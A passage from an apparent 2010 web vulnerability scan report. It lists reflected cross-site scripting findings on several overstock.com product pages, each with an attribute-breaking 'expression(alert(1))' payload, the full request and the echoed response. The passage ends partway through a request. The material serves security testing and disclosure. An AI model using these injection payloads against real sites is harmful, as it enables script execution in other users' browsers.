Path:   /Clothing-Shoes/Daxx-Mens-Top-Grain-Deerskin-Leather-Gloves-with-Thinsulate-Lining/2092746/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d252"style%3d"x%3aexpression(alert(1))"7b064bdd95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d252"style="x:expression(alert(1))"7b064bdd95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Daxx-Mens-Top-Grain-Deerskin-Leather-Gloves-with-Thinsulate-Lining/2092746/product.html?9d252"style%3d"x%3aexpression(alert(1))"7b064bdd95=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:04 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:04 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408224468:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:04 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2092746|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:04 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=11
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112215

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Da
...[SNIP]...
<input type="hidden" name="9d252"style="x:expression(alert(1))"7b064bdd95" value="1"/>
...[SNIP]...

2.29. http://www.overstock.com/Clothing-Shoes/Elio-Womens-3-4-sleeve-Pullover-Sweater/5113820/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Elio-Womens-3-4-sleeve-Pullover-Sweater/5113820/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37afd"style%3d"x%3aexpression(alert(1))"a385aa3962a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37afd"style="x:expression(alert(1))"a385aa3962a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Elio-Womens-3-4-sleeve-Pullover-Sweater/5113820/product.html?37afd"style%3d"x%3aexpression(alert(1))"a385aa3962a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:45 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408085836:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5113820|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:45 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:45 GMT; Path=/
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>El
...[SNIP]...
<input type="hidden" name="37afd"style="x:expression(alert(1))"a385aa3962a" value="1"/>
...[SNIP]...

2.30. http://www.overstock.com/Clothing-Shoes/Etienne-Aigner-Leather-Tote-Bag/5160306/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Etienne-Aigner-Leather-Tote-Bag/5160306/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa850"style%3d"x%3aexpression(alert(1))"d836fa131f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa850"style="x:expression(alert(1))"d836fa131f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Etienne-Aigner-Leather-Tote-Bag/5160306/product.html?fa850"style%3d"x%3aexpression(alert(1))"d836fa131f0=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:32 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:32 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:32 GMT; Path=/
Set-Cookie: mxcproclicks=5160306|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:32 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408192284:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107922

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Et
...[SNIP]...
<input type="hidden" name="fa850"style="x:expression(alert(1))"d836fa131f0" value="1"/>
...[SNIP]...

2.31. http://www.overstock.com/Clothing-Shoes/Fendi-FS-478-S-Womens-Designer-Sunglasses/4456999/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Fendi-FS-478-S-Womens-Designer-Sunglasses/4456999/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f42b"style%3d"x%3aexpression(alert(1))"a9af4174a88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f42b"style="x:expression(alert(1))"a9af4174a88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Fendi-FS-478-S-Womens-Designer-Sunglasses/4456999/product.html?6f42b"style%3d"x%3aexpression(alert(1))"a9af4174a88=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:00:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:00:18 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404818258:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4456999|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:18 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:18 GMT; Path=/
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Fe
...[SNIP]...
<input type="hidden" name="6f42b"style="x:expression(alert(1))"a9af4174a88" value="1"/>
...[SNIP]...

2.32. http://www.overstock.com/Clothing-Shoes/Fergie-Womens-Missy-Peep-toe-Heels/5235311/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Fergie-Womens-Missy-Peep-toe-Heels/5235311/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6ae"style%3d"x%3aexpression(alert(1))"dba8e86bc84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd6ae"style="x:expression(alert(1))"dba8e86bc84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Fergie-Womens-Missy-Peep-toe-Heels/5235311/product.html?bd6ae"style%3d"x%3aexpression(alert(1))"dba8e86bc84=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:53 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:53 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408153691:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5235311|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:53 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:53 GMT; Path=/
Keep-Alive: timeout=5, max=30
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109859

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Fe
...[SNIP]...
<input type="hidden" name="bd6ae"style="x:expression(alert(1))"dba8e86bc84" value="1"/>
...[SNIP]...

2.33. http://www.overstock.com/Clothing-Shoes/Ferrecci-Mens-Grey-Two-button-Suit/4251947/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ferrecci-Mens-Grey-Two-button-Suit/4251947/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 734dc"style%3d"x%3aexpression(alert(1))"74977cb26be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 734dc"style="x:expression(alert(1))"74977cb26be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Ferrecci-Mens-Grey-Two-button-Suit/4251947/product.html?734dc"style%3d"x%3aexpression(alert(1))"74977cb26be=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:26 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:26 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4251947|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:26 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404766346:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:26 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113583

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Fe
...[SNIP]...
<input type="hidden" name="734dc"style="x:expression(alert(1))"74977cb26be" value="1"/>
...[SNIP]...

2.34. http://www.overstock.com/Clothing-Shoes/Ferrecci-Mens-Light-Chocolate-Brown-Suit/4255610/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Ferrecci-Mens-Light-Chocolate-Brown-Suit/4255610/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca49"style%3d"x%3aexpression(alert(1))"32b9b3f096 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ca49"style="x:expression(alert(1))"32b9b3f096 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Ferrecci-Mens-Light-Chocolate-Brown-Suit/4255610/product.html?3ca49"style%3d"x%3aexpression(alert(1))"32b9b3f096=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:14 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:14 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289404754250:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:14 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4255610|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:14 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106946

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Fe
...[SNIP]...
<input type="hidden" name="3ca49"style="x:expression(alert(1))"32b9b3f096" value="1"/>
...[SNIP]...

2.35. http://www.overstock.com/Clothing-Shoes/Fringed-Pashmina-Shawl/4587463/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Fringed-Pashmina-Shawl/4587463/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1548"style%3d"x%3aexpression(alert(1))"8fddb195cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1548"style="x:expression(alert(1))"8fddb195cf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Fringed-Pashmina-Shawl/4587463/product.html?c1548"style%3d"x%3aexpression(alert(1))"8fddb195cf9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
